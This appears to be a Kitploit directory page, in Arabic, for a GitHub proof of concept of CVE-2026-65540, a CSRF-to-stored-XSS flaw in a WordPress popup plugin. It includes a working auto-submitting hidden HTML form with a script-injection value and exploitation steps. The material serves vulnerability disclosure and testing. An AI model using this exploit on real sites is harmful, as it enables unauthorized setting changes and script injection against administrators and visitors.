Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-65540 — Popup for CF7 with Sweet Alert <= 1.6.5 - تزوير الطلب من جانب الموقع | Kitploit
أدوات/GitHubGitHub/testardou/cve-2026-65540
ماسحات الثغرات الأمنية للويبتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويب
GitHubtestardou/cve-2026-65540

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - تزوير الطلب من جانب الموقع

عرض المستودع
منذ 14س 33دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-65540

Popup for CF7 with Sweet Alert <= 1.6.5 - تزوير الطلب عبر المواقع

رابط الإضافة

https://wordpress.org/plugins/cf7-sweet-alert-popup/

الوصف

يحتوي معالج الإعدادات في الإضافة على خطأ منطقي في التحقق من nonce يؤدي إلى تعطيل جميع حمايات CSRF. يمكن لمهاجم غير مُصادَق عليه استغلال ذلك عبر خداع مدير مُصادَق عليه لزيارة صفحة خبيثة تحتوي على نموذج مخفي يُرسل نفسه تلقائيًا، مما يتيح تعديل إعدادات الإضافة بشكل عشوائي. تُخزَّن القيم المُرسَلة دون تنقية وتُحقَن حرفيًا داخل وسم

POC

  1. استضف صفحة HTML التالية على خادم منفصل:
root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<h1>Hello</h1>

<form style="visibility:hidden" action="http://TARGET/wp-admin/admin.php?page=cf7-simplepopup"
      method="POST" id="csrf" target="hiddenframe">
  <input name="cf7simplePopupWidth" value="500;alert(document.domain)">
  <input name="cf7simplePopupNonce" value="invalid_nonce">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
  1. سجّل الدخول إلى WordPress بصفة مدير
  2. قم بزيارة الصفحة الخبيثة
  3. (اختياري) انتقل إلى http://TARGET/wp-admin/admin.php?page=cf7-simplepopup — تأكد من أن حقل Width يحتوي الآن على 500;alert(document.domain)
  • قم بزيارة أي صفحة من صفحات الواجهة الأمامية — سيُنفَّذ alert(document.domain) في المتصفح مؤكدًا وجود XSS مخزَّن
  • تنزيل الأداة